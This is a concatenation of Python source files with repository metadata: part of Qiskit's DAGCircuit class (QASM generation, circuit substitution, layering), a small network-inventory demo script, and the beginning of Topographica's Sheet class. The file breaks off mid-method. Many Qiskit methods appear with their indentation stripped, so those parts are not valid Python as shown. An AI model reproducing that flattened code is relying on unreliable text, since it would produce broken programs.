            self.apply_operation_front(nd["name"], m_qargs, m_cargs,
                                       nd["params"], condition)
        else:
            assert False, "bad node type %s" % nd["type"]
def size(self):
"""Return the number of operations."""
return self.multi_graph.order() - 2 * len(self.wire_type)
def depth(self):
    """Return the circuit depth.

    This is the longest path through the DAG minus one, so an empty
    wire (input connected directly to output) contributes depth 0.
    """
    assert nx.is_directed_acyclic_graph(self.multi_graph), "not a DAG"
    return nx.dag_longest_path_length(self.multi_graph) - 1
def width(self):
"""Return the total number of qubits used by the circuit."""
return len(self.wire_type) - self.num_cbits()
def num_cbits(self):
"""Return the total number of bits used by the circuit."""
return list(self.wire_type.values()).count(True)
def num_tensor_factors(self):
    """Return how many independent components the circuit splits into
    (weakly connected components of the DAG).
    """
    return nx.number_weakly_connected_components(self.multi_graph)
def _gate_string(self, name):
"""Return a QASM string for the named gate."""
out = ""
if self.gates[name]["opaque"]:
out = "opaque " + name
else:
out = "gate " + name
if self.gates[name]["n_args"] > 0:
out += "(" + ",".join(self.gates[name]["args"]) + ")"
out += " " + ",".join(self.gates[name]["bits"])
if self.gates[name]["opaque"]:
out += ";"
else:
out += "\n{\n" + self.gates[name]["body"].qasm() + "}"
return out
def qasm(self, decls_only=False, add_swap=False,
         no_decls=False, qeflag=False, aliases=None):
    """Return a string containing QASM for this circuit.

    if qeflag is True, add a line to include "qelib1.inc"
    and only generate gate code for gates not in qelib1.

    if no_decls is True, only print the instructions.

    if aliases is not None, aliases contains a dict mapping
    the current qubits in the circuit to new qubit names.
    We will deduce the register names and sizes from aliases.

    if decls_only is True, only print the declarations.

    if add_swap is True, add the definition of swap in terms of
    cx if necessary.
    """
    # Rename qregs if necessary: the size of each aliased register is
    # one more than the highest index used for that register name.
    if aliases:
        qregdata = {}
        for q in aliases.values():
            if q[0] not in qregdata:
                qregdata[q[0]] = q[1] + 1
            elif qregdata[q[0]] < q[1] + 1:
                qregdata[q[0]] = q[1] + 1
    else:
        qregdata = self.qregs
    # Write top matter
    if no_decls:
        out = ""
    else:
        printed_gates = []
        out = "OPENQASM 2.0;\n"
        if qeflag:
            out += "include \"qelib1.inc\";\n"
        for k, v in sorted(qregdata.items()):
            out += "qreg %s[%d];\n" % (k, v)
        for k, v in sorted(self.cregs.items()):
            out += "creg %s[%d];\n" % (k, v)
        # Built-in operations never need gate declarations.
        omit = ["U", "CX", "measure", "reset", "barrier"]
        if qeflag:
            qelib = ["u3", "u2", "u1", "cx", "id", "x", "y", "z", "h",
                     "s", "sdg", "t", "tdg", "cz", "cy", "ccx", "cu1",
                     "cu3"]
            omit.extend(qelib)
            printed_gates.extend(qelib)
        for k in self.basis.keys():
            if k not in omit:
                # Emit a gate's callees before the gate itself so each
                # declaration appears before its first use.
                if not self.gates[k]["opaque"]:
                    calls = self.gates[k]["body"].calls()
                    for c in calls:
                        if c not in printed_gates:
                            out += self._gate_string(c) + "\n"
                            printed_gates.append(c)
                if k not in printed_gates:
                    out += self._gate_string(k) + "\n"
                    printed_gates.append(k)
        if add_swap and not qeflag and "cx" not in self.basis:
            out += "gate cx a,b { CX a,b; }\n"
        if add_swap and "swap" not in self.basis:
            out += "gate swap a,b { cx a,b; cx b,a; cx a,b; }\n"
    # Write the instructions
    if not decls_only:
        ts = nx.topological_sort(self.multi_graph)
        for n in ts:
            nd = self.multi_graph.node[n]
            if nd["type"] == "op":
                if nd["condition"] is not None:
                    out += "if(%s==%d) " \
                           % (nd["condition"][0], nd["condition"][1])
                if len(nd["cargs"]) == 0:
                    # Ordinary gate: name, optional params, qubit args.
                    nm = nd["name"]
                    if aliases:
                        qarglist = map(lambda x: aliases[x], nd["qargs"])
                    else:
                        qarglist = nd["qargs"]
                    qarg = ",".join(map(lambda x: "%s[%d]" % (x[0], x[1]),
                                        qarglist))
                    if len(nd["params"]) > 0:
                        param = ",".join(nd["params"])
                        out += "%s(%s) %s;\n" % (nm, param, qarg)
                    else:
                        out += "%s %s;\n" % (nm, qarg)
                else:
                    # measure is the only operation with classical args.
                    if nd["name"] == "measure":
                        assert len(nd["cargs"]) == 1 and \
                            len(nd["qargs"]) == 1 and \
                            len(nd["params"]) == 0, "bad node data"
                        qname = nd["qargs"][0][0]
                        qindex = nd["qargs"][0][1]
                        if aliases:
                            newq = aliases[(qname, qindex)]
                            qname = newq[0]
                            qindex = newq[1]
                        out += "measure %s[%d] -> %s[%d];\n" \
                               % (qname,
                                  qindex,
                                  nd["cargs"][0][0],
                                  nd["cargs"][0][1])
                    else:
                        assert False, "bad node data"
    return out
def _check_wires_list(self, wires, name, input_circuit):
"""Check that a list of wires satisfies some conditions.
The wires give an order for (qu)bits in the input circuit
that is replacing the named operation.
- no duplicate names
- correct length for named operation
- elements are wires of input_circuit
Raises an exception otherwise.
"""
if len(set(wires)) != len(wires):
raise DAGCircuitError("duplicate wires")
wire_tot = self.basis[name][0] + self.basis[name][1]
if len(wires) != wire_tot:
raise DAGCircuitError("expected %d wires, got %d"
% (wire_tot, len(wires)))
for w in wires:
if w not in input_circuit.wire_type:
raise DAGCircuitError("wire (%s,%d) not in input circuit"
% (w[0], w[1]))
def _make_pred_succ_maps(self, n):
"""Return predecessor and successor dictionaries.
These map from wire names to predecessor and successor
nodes for the operation node n in self.multi_graph.
"""
pred_map = {e[2]['name']: e[0] for e in
self.multi_graph.in_edges_iter(nbunch=n, data=True)}
succ_map = {e[2]['name']: e[1] for e in
self.multi_graph.out_edges_iter(nbunch=n, data=True)}
return pred_map, succ_map
def _full_pred_succ_maps(self, pred_map, succ_map, input_circuit,
                         wire_map):
    """Map all wires of the input circuit.

    Map all wires of the input circuit to predecessor and
    successor nodes in self, keyed on wires in self.

    pred_map, succ_map dicts come from _make_pred_succ_maps
    input_circuit is the input circuit
    wire_map is the wire map from wires of input_circuit to wires of self

    returns full_pred_map, full_succ_map
    """
    full_pred_map = {}
    full_succ_map = {}
    for w in input_circuit.input_map:
        # If w is wire mapped, find the corresponding predecessor
        # of the node
        if w in wire_map:
            full_pred_map[wire_map[w]] = pred_map[wire_map[w]]
            full_succ_map[wire_map[w]] = succ_map[wire_map[w]]
        else:
            # Otherwise, use the corresponding output nodes of self
            # and compute the predecessor.
            full_succ_map[w] = self.output_map[w]
            full_pred_map[w] = self.multi_graph.predecessors(self.output_map[w])[
                0]
            # Every output node must have exactly one in-edge.
            assert len(self.multi_graph.predecessors(self.output_map[w])) == 1,\
                "too many predecessors for (%s,%d) output node" % (
                    w[0], w[1])
    return full_pred_map, full_succ_map
def substitute_circuit_all(self, name, input_circuit, wires=[]):
    """Replace every occurrence of named operation with input_circuit.

    name -- basis operation to replace
    input_circuit -- DAGCircuit whose operations are spliced in
    wires -- ordered list of input_circuit wires matching the replaced
        operation's (qu)bit argument order

    NOTE(review): the mutable default for ``wires`` is only read here,
    never mutated, so it is safe in practice.
    """
    if name not in self.basis:
        raise DAGCircuitError("%s is not in the list of basis operations"
                              % name)
    self._check_wires_list(wires, name, input_circuit)
    union_basis = self._make_union_basis(input_circuit)
    union_gates = self._make_union_gates(input_circuit)
    # Create a proxy wire_map to identify fragments and duplicates
    # and determine what registers need to be added to self
    proxy_map = {w: ("", 0) for w in wires}
    add_qregs = self._check_wiremap_registers(proxy_map,
                                              input_circuit.qregs,
                                              {}, False)
    for r in add_qregs:
        self.add_qreg(r[0], r[1])
    add_cregs = self._check_wiremap_registers(proxy_map,
                                              input_circuit.cregs,
                                              {}, False)
    for r in add_cregs:
        self.add_creg(r[0], r[1])
    # Iterate through the nodes of self and replace the selected nodes
    # by iterating through the input_circuit, constructing and
    # checking the validity of the wire_map for each replacement
    # NOTE: We do not replace conditioned gates. One way to implement
    # this later is to add or update the conditions of each gate
    # that we add from the input_circuit.
    self.basis = union_basis
    self.gates = union_gates
    ts = nx.topological_sort(self.multi_graph)
    for n in ts:
        nd = self.multi_graph.node[n]
        if nd["type"] == "op" and nd["name"] == name:
            if nd["condition"] is None:
                # Pair each listed wire with the matched node's args
                # (qargs first, then cargs).
                wire_map = {k: v for k, v in zip(wires,
                                                 [i for s in [nd["qargs"], nd["cargs"]]
                                                  for i in s])}
                self._check_wiremap_validity(wire_map, wires,
                                             self.input_map, input_circuit)
                pred_map, succ_map = self._make_pred_succ_maps(n)
                full_pred_map, full_succ_map = \
                    self._full_pred_succ_maps(pred_map, succ_map,
                                              input_circuit, wire_map)
                # Now that we know the connections, delete node
                self.multi_graph.remove_node(n)
                # Iterate over nodes of input_circuit
                tsin = nx.topological_sort(input_circuit.multi_graph)
                for m in tsin:
                    md = input_circuit.multi_graph.node[m]
                    if md["type"] == "op":
                        # Insert a new node
                        condition = self._map_condition(wire_map,
                                                        md["condition"])
                        m_qargs = list(map(lambda x: wire_map.get(x, x),
                                           md["qargs"]))
                        m_cargs = list(map(lambda x: wire_map.get(x, x),
                                           md["cargs"]))
                        self._add_op_node(md["name"], m_qargs, m_cargs,
                                          md["params"], condition)
                        # Add edges from predecessor nodes to new node
                        # and update predecessor nodes that change
                        all_cbits = self._bits_in_condition(condition)
                        all_cbits.extend(m_cargs)
                        al = [m_qargs, all_cbits]
                        for q in itertools.chain(*al):
                            self.multi_graph.add_edge(full_pred_map[q],
                                                      self.node_counter, name=q)
                            full_pred_map[q] = copy.copy(self.node_counter)
                # Connect all predecessors and successors, and remove
                # residual edges between input and output nodes
                for w in full_pred_map.keys():
                    self.multi_graph.add_edge(full_pred_map[w], full_succ_map[w],
                                              name=w)
                    o_pred = self.multi_graph.predecessors(
                        self.output_map[w])
                    if len(o_pred) > 1:
                        # Exactly one residual in/out edge should remain.
                        assert len(o_pred) == 2, \
                            "expected 2 predecessors here"
                        p = list(filter(lambda x: x != full_pred_map[w],
                                        o_pred))
                        assert len(p) == 1, \
                            "expected 1 predecessor to pass filter"
                        self.multi_graph.remove_edge(
                            p[0], self.output_map[w])
def substitute_circuit_one(self, node, input_circuit, wires=[]):
"""Replace one node with input_circuit.
node is a reference to a node of self.multi_graph of type "op"
input_circuit is a DAGCircuit
"""
nd = self.multi_graph.node[node]
# TODO: reuse common code in substitute_circuit_one and _all
name = nd["name"]
self._check_wires_list(wires, name, input_circuit)
union_basis = self._make_union_basis(input_circuit)
union_gates = self._make_union_gates(input_circuit)
# Create a proxy wire_map to identify fragments and duplicates
# and determine what registers need to be added to self
proxy_map = {w: ("", 0) for w in wires}
add_qregs = self._check_wiremap_registers(proxy_map,
input_circuit.qregs,
{}, False)
for r in add_qregs:
self.add_qreg(r[0], r[1])
add_cregs = self._check_wiremap_registers(proxy_map,
input_circuit.cregs,
{}, False)
for r in add_cregs:
self.add_creg(r[0], r[1])
# Replace the node by iterating through the input_circuit.
# Constructing and checking the validity of the wire_map.
# NOTE: We do not replace conditioned gates. One way to implement
# later is to add or update the conditions of each gate we add
# from the input_circuit.
self.basis = union_basis
self.gates = union_gates
if nd["type"] != "op":
raise DAGCircuitError("expected node type \"op\", got %s"
% nd["type"])
if nd["condition"] is None:
wire_map = {k: v for k, v in zip(wires,
[i for s in [nd["qargs"],
nd["cargs"]]
for i in s])}
self._check_wiremap_validity(wire_map, wires,
self.input_map, input_circuit)
pred_map, succ_map = self._make_pred_succ_maps(node)
full_pred_map, full_succ_map = \
self._full_pred_succ_maps(pred_map, succ_map,
input_circuit, wire_map)
# Now that we know the connections, delete node
self.multi_graph.remove_node(node)
# Iterate over nodes of input_circuit
tsin = nx.topological_sort(input_circuit.multi_graph)
for m in tsin:
md = input_circuit.multi_graph.node[m]
if md["type"] == "op":
# Insert a new node
condition = self._map_condition(wire_map, md["condition"])
m_qargs = list(map(lambda x: wire_map.get(x, x),
md["qargs"]))
m_cargs = list(map(lambda x: wire_map.get(x, x),
md["cargs"]))
self._add_op_node(md["name"], m_qargs, m_cargs,
md["params"], condition)
# Add edges from predecessor nodes to new node
# and update predecessor nodes that change
all_cbits = self._bits_in_condition(condition)
all_cbits.extend(m_cargs)
al = [m_qargs, all_cbits]
for q in itertools.chain(*al):
self.multi_graph.add_edge(full_pred_map[q], self.node_counter,
name=q)
full_pred_map[q] = copy.copy(self.node_counter)
# Connect all predecessors and successors, and remove
# residual edges between input and output nodes
for w in full_pred_map.keys():
self.multi_graph.add_edge(
full_pred_map[w], full_succ_map[w], name=w)
o_pred = self.multi_graph.predecessors(self.output_map[w])
if len(o_pred) > 1:
assert len(o_pred) == 2, "expected 2 predecessors here"
p = list(filter(lambda x: x != full_pred_map[w], o_pred))
assert len(p) == 1, "expected 1 predecessor to pass filter"
self.multi_graph.remove_edge(p[0], self.output_map[w])
def get_named_nodes(self, name):
"""Return a list of "op" nodes with the given name."""
nlist = []
if name not in self.basis:
raise DAGCircuitError("%s is not in the list of basis operations"
% name)
# Iterate through the nodes of self in topological order
ts = nx.topological_sort(self.multi_graph)
for n in ts:
nd = self.multi_graph.node[n]
if nd["type"] == "op" and nd["name"] == name:
nlist.append(n)
return nlist
def _remove_op_node(self, n):
"""Remove an operation node n.
Add edges from predecessors to successors.
"""
pred_map, succ_map = self._make_pred_succ_maps(n)
self.multi_graph.remove_node(n)
for w in pred_map.keys():
self.multi_graph.add_edge(pred_map[w], succ_map[w], name=w)
def remove_ancestors_of(self, node):
"""Remove all of the ancestor operation nodes of node."""
anc = nx.ancestors(self.multi_graph, node)
# TODO: probably better to do all at once using
# multi_graph.remove_nodes_from; same for related functions ...
for n in anc:
nd = self.multi_graph.node[n]
if nd["type"] == "op":
self._remove_op_node(n)
def remove_descendants_of(self, node):
"""Remove all of the descendant operation nodes of node."""
dec = nx.descendants(self.multi_graph, node)
for n in dec:
nd = self.multi_graph.node[n]
if nd["type"] == "op":
self._remove_op_node(n)
def remove_nonancestors_of(self, node):
"""Remove all of the non-ancestors operation nodes of node."""
anc = nx.ancestors(self.multi_graph, node)
comp = list(set(self.multi_graph.nodes()) - set(anc))
for n in comp:
nd = self.multi_graph.node[n]
if nd["type"] == "op":
self._remove_op_node(n)
def remove_nondescendants_of(self, node):
"""Remove all of the non-descendants operation nodes of node."""
dec = nx.descendants(self.multi_graph, node)
comp = list(set(self.multi_graph.nodes()) - set(dec))
for n in comp:
nd = self.multi_graph.node[n]
if nd["type"] == "op":
self._remove_op_node(n)
    def layers(self):
        """Return a list of layers for all d layers of this circuit.
        A layer is a circuit whose gates act on disjoint qubits, i.e.
        a layer has depth 1. The total number of layers equals the
        circuit depth d. The layers are indexed from 0 to d-1 with the
        earliest layer at index 0. The layers are constructed using a
        greedy algorithm. Each returned layer is a dict containing
        {"graph": circuit graph, "partition": list of qubit lists}.
        TODO: Gates that use the same cbits will end up in different
        layers as this is currently implemented. This may not be
        the desired behavior.
        """
        # NOTE(review): relies on networkx 1.x APIs (graph.node attribute,
        # list-returning out_edges) -- confirm the pinned networkx version.
        layers_list = []
        # node_map contains an input node or previous layer node for
        # each wire in the circuit.
        node_map = copy.deepcopy(self.input_map)
        # wires_with_ops_remaining is a set of wire names that have
        # operations we still need to assign to layers
        wires_with_ops_remaining = set(self.input_map.keys())
        while wires_with_ops_remaining:
            # Create a new circuit graph and populate with regs and basis
            new_layer = DAGCircuit()
            for k, v in self.qregs.items():
                new_layer.add_qreg(k, v)
            for k, v in self.cregs.items():
                new_layer.add_creg(k, v)
            new_layer.basis = copy.deepcopy(self.basis)
            new_layer.gates = copy.deepcopy(self.gates)
            # Save the support of each operation we add to the layer
            support_list = []
            # Determine what operations to add in this layer
            # ops_touched is a map from operation nodes touched in this
            # iteration to the set of their unvisited input wires. When all
            # of the inputs of a touched node are visited, the node is a
            # foreground node we can add to the current layer.
            ops_touched = {}
            # Snapshot the wire set: wires_with_ops_remaining is mutated
            # inside the loop when a wire reaches its output node.
            wires_loop = list(wires_with_ops_remaining)
            # emit records whether at least one op was added to this layer.
            emit = False
            for w in wires_loop:
                oe = list(filter(lambda x: x[2]["name"] == w,
                                 self.multi_graph.out_edges(nbunch=[node_map[w]],
                                                            data=True)))
                assert len(oe) == 1, "should only be one out-edge per (qu)bit"
                nxt_nd_idx = oe[0][1]
                nxt_nd = self.multi_graph.node[nxt_nd_idx]
                # If we reach an output node, we are done with this wire.
                if nxt_nd["type"] == "out":
                    wires_with_ops_remaining.remove(w)
                # Otherwise, we are somewhere inside the circuit
                elif nxt_nd["type"] == "op":
                    # Operation data
                    qa = copy.copy(nxt_nd["qargs"])
                    ca = copy.copy(nxt_nd["cargs"])
                    pa = copy.copy(nxt_nd["params"])
                    co = copy.copy(nxt_nd["condition"])
                    cob = self._bits_in_condition(co)
                    # First time we see an operation, add to ops_touched
                    if nxt_nd_idx not in ops_touched:
                        ops_touched[nxt_nd_idx] = set(qa) | set(ca) | set(cob)
                    # Mark inputs visited by deleting from set
                    # NOTE: expect trouble with if(c==1) measure q -> c;
                    assert w in ops_touched[nxt_nd_idx], "expected wire"
                    ops_touched[nxt_nd_idx].remove(w)
                    # Node becomes "foreground" if set becomes empty,
                    # i.e. every input is available for this operation
                    if not ops_touched[nxt_nd_idx]:
                        # Add node to new_layer
                        new_layer.apply_operation_back(nxt_nd["name"],
                                                       qa, ca, pa, co)
                        # Update node_map to point to this op
                        for v in itertools.chain(qa, ca, cob):
                            node_map[v] = nxt_nd_idx
                        # Add operation to partition
                        if nxt_nd["name"] != "barrier":
                            # support_list.append(list(set(qa) | set(ca) |
                            #                          set(cob)))
                            support_list.append(list(set(qa)))
                        emit = True
            if emit:
                l_dict = {"graph": new_layer, "partition": support_list}
                layers_list.append(l_dict)
                emit = False
            else:
                assert not wires_with_ops_remaining, "not finished but empty?"
        return layers_list
def serial_layers(self):
"""Return a list of layers for all gates of this circuit.
A serial layer is a circuit with one gate. The layers have the
same structure as in layers().
"""
layers_list = []
ts = nx.topological_sort(self.multi_graph)
for n in ts:
nxt_nd = self.multi_graph.node[n]
if nxt_nd["type"] == "op":
new_layer = DAGCircuit()
for k, v in self.qregs.items():
new_layer.add_qreg(k, v)
for k, v in self.cregs.items():
new_layer.add_creg(k, v)
new_layer.basis = copy.deepcopy(self.basis)
new_layer.gates = copy.deepcopy(self.gates)
# Save the support of the operation we add to the layer
support_list = []
# Operation data
qa = copy.copy(nxt_nd["qargs"])
ca = copy.copy(nxt_nd["cargs"])
pa = copy.copy(nxt_nd["params"])
co = copy.copy(nxt_nd["condition"])
cob = self._bits_in_condition(co)
# Add node to new_layer
new_layer.apply_operation_back(nxt_nd["name"],
qa, ca, pa, co)
# Add operation to partition
if nxt_nd["name"] != "barrier":
# support_list.append(list(set(qa) | set(ca) | set(cob)))
support_list.append(list(set(qa)))
l_dict = {"graph": new_layer, "partition": support_list}
layers_list.append(l_dict)
return layers_list
    def collect_runs(self, namelist):
        """Return a set of runs of "op" nodes with the given names.
        For example, "... h q[0]; cx q[0],q[1]; cx q[0],q[1]; h q[1]; .."
        would produce the tuple of cx nodes as an element of the set returned
        from a call to collect_runs(["cx"]). If instead the cx nodes were
        "cx q[0],q[1]; cx q[1],q[0];", the method would still return the
        pair in a tuple. The namelist can contain names that are not
        in the circuit's basis.
        Nodes must have only one successor to continue the run.
        """
        # NOTE(review): assumes networkx 1.x where topological_sort and
        # successors return lists (len() is applied) -- confirm version.
        group_list = []
        # Iterate through the nodes of self in topological order
        # and form tuples containing sequences of gates
        # on the same qubit(s).
        ts = nx.topological_sort(self.multi_graph)
        # Tracks nodes already absorbed into an earlier run.
        nodes_seen = dict(zip(ts, [False] * len(ts)))
        for node in ts:
            nd = self.multi_graph.node[node]
            if nd["type"] == "op" and nd["name"] in namelist \
                    and not nodes_seen[node]:
                # Start a new run at this node and extend it while the
                # unique successor is also a matching op.
                group = [node]
                nodes_seen[node] = True
                s = self.multi_graph.successors(node)
                while len(s) == 1 and \
                        self.multi_graph.node[s[0]]["type"] == "op" and \
                        self.multi_graph.node[s[0]]["name"] in namelist:
                    group.append(s[0])
                    nodes_seen[s[0]] = True
                    s = self.multi_graph.successors(s[0])
                # Only multi-node sequences count as runs.
                if len(group) > 1:
                    group_list.append(tuple(group))
        return set(group_list)
def count_ops(self):
"""Count the occurrences of operation names.
Returns a dictionary of counts keyed on the operation name.
"""
op_dict = {}
ts = nx.topological_sort(self.multi_graph)
for node in ts:
nd = self.multi_graph.node[node]
name = nd["name"]
if nd["type"] == "op":
if name not in op_dict:
op_dict[name] = 1
else:
op_dict[name] += 1
return op_dict
def property_summary(self):
"""Return a dictionary of circuit properties."""
summary = {"size": self.size(),
"depth": self.depth(),
"width": self.width(),
"bits": self.num_cbits(),
"factors": self.num_tensor_factors(),
"operations": self.count_ops()}
return summary
| {
"content_hash": "af04033fdd471a0b9d72e789ae3bd51e",
"timestamp": "",
"source": "github",
"line_count": 1267,
"max_line_length": 91,
"avg_line_length": 45.4127861089187,
"alnum_prop": 0.5127741666377003,
"repo_name": "ChristopheVuillot/qiskit-sdk-py",
"id": "5a6770110654929ac4dc8d4d8c08d90a33c2af48",
"size": "58242",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "qiskit/dagcircuit/_dagcircuit.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Batchfile",
"bytes": "2582"
},
{
"name": "C++",
"bytes": "2273"
},
{
"name": "Makefile",
"bytes": "1834"
},
{
"name": "Python",
"bytes": "757305"
},
{
"name": "Shell",
"bytes": "4853"
}
],
"symlink_target": ""
} |
''' Sample usage of function 'inventory_summary' to print a list of the inventory, with the connected status and number
of Netconf capabilities.
Print the function's documentation then invoke the function and print the output.
The related function `inventory()` returns only the name of each network device.
To see more than just the name of the device use function `inventory_summary()`.
'''
from __future__ import print_function as _print_function
from pydoc import render_doc as doc
from pydoc import plain
from basics.inventory import inventory_summary, InventorySummary
from basics.render import print_table
# type_doc = plain(doc(InventorySummary))
def main():
    """Print inventory_summary()'s docs, the record fields, and the table."""
    print(plain(doc(inventory_summary)))
    field_names = InventorySummary._fields
    print('InventorySummary fields:', *field_names, sep='\n\t', end='\n\n')
    print_table(inventory_summary())
if __name__ == "__main__":
main() | {
"content_hash": "f7280937eef6d240128c0ea8f001851f",
"timestamp": "",
"source": "github",
"line_count": 23,
"max_line_length": 120,
"avg_line_length": 39.21739130434783,
"alnum_prop": 0.7283813747228381,
"repo_name": "tbarrongh/cosc-learning-labs",
"id": "077b70251960d03d499b6d13b3de9f94d6b83537",
"size": "1505",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "src/learning_lab/01_inventory_summary.py",
"mode": "33261",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "354065"
},
{
"name": "Shell",
"bytes": "2128"
}
],
"symlink_target": ""
} |
"""
Neural sheet objects and associated functions.
The Sheet class is the base class for EventProcessors that simulate
topographically mapped sheets of units (neurons or columns). A Sheet
is an EventProcessor that maintains a rectangular array of activity
values, and sends the contents of this array as the data element in
events.
The Sheet itself is a SheetCoordinateSystem, so that units may be
accessed by sheet or matrix coordinates. In general, however, sheets
should be thought of as having arbitrary density and sheet coordinates
should be used wherever possible, except when the code needs direct
access to a specific unit. By adhering to this convention, one should
be able to write and debug a simulation at a low density, and then
scale it up to run at higher densities (or down for lower densities)
simply by changing e.g. Sheet.nominal_density.
$Id$
"""
__version__ = '$Revision$'
from numpy import zeros,array,arange,meshgrid
from numpy import float64
import param
from simulation import EventProcessor
from sheetcoords import SheetCoordinateSystem
from boundingregion import BoundingBox, BoundingRegionParameter
from functionfamily import TransferFn
# Numeric dtype used for Sheet activity matrices (see Sheet.__init__).
activity_type = float64
# (disable W0223 because input_event is deliberately still not implemented)
# (disable W0223 because input_event is deliberately still not implemented)
class Sheet(EventProcessor,SheetCoordinateSystem): # pylint: disable-msg=W0223
    """
    The generic base class for neural sheets.
    See SheetCoordinateSystem for how Sheet represents space, and
    EventProcessor for how Sheet handles time.
    output_fns are functions that take an activity matrix and produce
    an identically shaped output matrix. The default is having no
    output_fns.
    """
    # Marks this class abstract for the param library; only subclasses
    # are intended to be instantiated.
    __abstract = True
    nominal_bounds = BoundingRegionParameter(BoundingBox(radius=0.5),constant=True,doc="""
        User-specified BoundingBox of the Sheet coordinate area
        covered by this Sheet. The left and right bounds--if
        specified--will always be observed, but the top and bottom
        bounds may be adjusted to ensure the density in the y
        direction is the same as the density in the x direction.
        In such a case, the top and bottom bounds are adjusted
        so that the center y point remains the same, and each
        bound is as close as possible to its specified value. The
        actual value of this Parameter is not adjusted, but the
        true bounds may be found from the 'bounds' attribute
        of this object.
        """)
    nominal_density = param.Number(default=10,constant=True,doc="""
        User-specified number of processing units per 1.0 distance
        horizontally or vertically in Sheet coordinates. The actual
        number may be different because of discretization; the matrix
        needs to tile the plane exactly, and for that to work the
        density might need to be adjusted. For instance, an area of 3x2
        cannot have a density of 2 in each direction. The true density
        may be obtained from either the xdensity or ydensity attribute
        (since these are identical for a Sheet).
        """)
    plastic = param.Boolean(True,doc="""
        Setting this to False tells the Sheet not to change its
        permanent state (e.g. any connection weights) based on
        incoming events.
        """)
    precedence = param.Number(default = 0.1, softbounds=(0.0,1.0),doc="""
        Allows a sorting order for Sheets, e.g. in the GUI.""")
    row_precedence = param.Number(default = 0.5, softbounds=(0.0,1.0),doc="""
        Allows grouping of Sheets before sorting precedence is
        applied, e.g. for two-dimensional plots in the GUI.""")
    layout_location = param.NumericTuple(default = (-1,-1),precedence=-1,doc="""
        Location for this Sheet in an arbitrary pixel-based space
        in which Sheets can be laid out for visualization.""")
    output_fns = param.HookList(default=[],class_=TransferFn,
        doc="Output function(s) to apply (if apply_output_fns is true) to this Sheet's activity.")
    apply_output_fns=param.Boolean(default=True,
        doc="Whether to apply the output_fn after computing an Activity matrix.")
    def _get_density(self):
        # Backing getter for the read-only `density` property below.
        return self.xdensity
    density = property(_get_density,doc="""The sheet's true density (i.e. the xdensity, which is equal to the ydensity for a Sheet.)""")
    def __init__(self,**params):
        """
        Initialize this object as an EventProcessor, then also as
        a SheetCoordinateSystem with equal xdensity and ydensity.
        sheet_views is a dictionary that stores SheetViews,
        i.e. representations of the sheet for use by analysis or plotting
        code.
        """
        EventProcessor.__init__(self,**params)
        # Initialize this object as a SheetCoordinateSystem, with
        # the same density along y as along x.
        SheetCoordinateSystem.__init__(self,self.nominal_bounds,self.nominal_density)
        # Sanity check: the sheet must be wide enough for at least one
        # unit (lbrt[2]-lbrt[0] presumably is the sheet width -- confirm).
        n_units = round((self.lbrt[2]-self.lbrt[0])*self.xdensity,0)
        if n_units<1: raise ValueError(
            "Sheet bounds and density must be specified such that the "+ \
            "sheet has at least one unit in each direction; " \
            +self.name+ " does not.")
        # setup the activity matrix
        self.activity = zeros(self.shape,activity_type)
        # For non-plastic inputs
        # Stacks used by state_push/state_pop and
        # override/restore_plasticity_state below.
        self.__saved_activity = []
        self._plasticity_setting_stack = []
        self.sheet_views = {}
    ### JABALERT: This should be deleted now that sheet_views is public
    ### JC: shouldn't we keep that, or at least write a function in
    ### utils that deletes a value in a dictinnary without returning an
    ### error if the key is not in the dict? I leave for the moment,
    ### and have to ask Jim to advise.
    def release_sheet_view(self,view_name):
        """
        Delete the dictionary entry with key entry 'view_name' to save
        memory.
        """
        # NOTE(review): dict.has_key is Python 2 only; on Python 3 this
        # would need `view_name in self.sheet_views`.
        if self.sheet_views.has_key(view_name):
            del self.sheet_views[view_name]
    # CB: what to call this? sheetcoords()? sheetcoords_of_grid()? idxsheetcoords()?
    def sheetcoords_of_idx_grid(self):
        """
        Return an array of x-coordinates and an array of y-coordinates
        corresponding to the activity matrix of the sheet.
        """
        nrows,ncols=self.activity.shape
        C,R = meshgrid(arange(ncols),
                       arange(nrows))
        X,Y = self.matrixidx2sheet(R,C)
        return X,Y
    # CB: check whether we need this function any more.
    def row_col_sheetcoords(self):
        """
        Return an array of Y-coordinates corresponding to the rows of
        the activity matrix of the sheet, and an array of
        X-coordinates corresponding to the columns.
        """
        # The row and column centers are returned in matrix (not
        # sheet) order (hence the reversals below).
        nrows,ncols = self.activity.shape
        return self.matrixidx2sheet(arange(nrows-1,-1,-1),arange(ncols))[::-1]
    # CBALERT: to be removed once other code uses
    # row_col_sheetcoords() or sheetcoords_of_idx_grid().
    def sheet_rows(self):
        # Y-coordinates of each matrix row (see row_col_sheetcoords).
        return self.row_col_sheetcoords()[0]
    def sheet_cols(self):
        # X-coordinates of each matrix column (see row_col_sheetcoords).
        return self.row_col_sheetcoords()[1]
    # CEBALERT: haven't really thought about what to put in this. The
    # way it is now, subclasses could make a super.activate() call to
    # avoid repeating some stuff.
    def activate(self):
        """
        Collect activity from each projection, combine it to calculate
        the activity for this sheet, and send the result out.
        Subclasses will need to override this method to whatever it
        means to calculate activity in that subclass.
        """
        # Apply each output function in-place to the activity matrix.
        if self.apply_output_fns:
            for of in self.output_fns:
                of(self.activity)
        self.send_output(src_port='Activity',data=self.activity)
    def state_push(self):
        """
        Save the current state of this sheet to an internal stack.
        This method is used by operations that need to test the
        response of the sheet without permanently altering its state,
        e.g. for measuring maps or probing the current behavior
        non-invasively. By default, only the activity pattern of this
        sheet is saved, but subclasses should add saving for any
        additional state that they maintain, or strange bugs are
        likely to occur. The state can be restored using state_pop().
        Note that Sheets that do learning need not save the
        values of all connection weights, if any, because
        plasticity can be turned off explicitly. Thus this method
        is intended only for shorter-term state.
        """
        # array(...) makes a copy, so later changes to self.activity
        # do not affect the saved snapshot.
        self.__saved_activity.append(array(self.activity))
        EventProcessor.state_push(self)
        # Propagate the push to any output function that supports it.
        for of in self.output_fns:
            if hasattr(of,'state_push'):
                of.state_push()
    def state_pop(self):
        """
        Pop the most recently saved state off the stack.
        See state_push() for more details.
        """
        self.activity = self.__saved_activity.pop()
        EventProcessor.state_pop(self)
        for of in self.output_fns:
            if hasattr(of,'state_pop'):
                of.state_pop()
    def activity_len(self):
        """Return the number of items that have been saved by state_push()."""
        return len(self.__saved_activity)
    def override_plasticity_state(self, new_plasticity_state):
        """
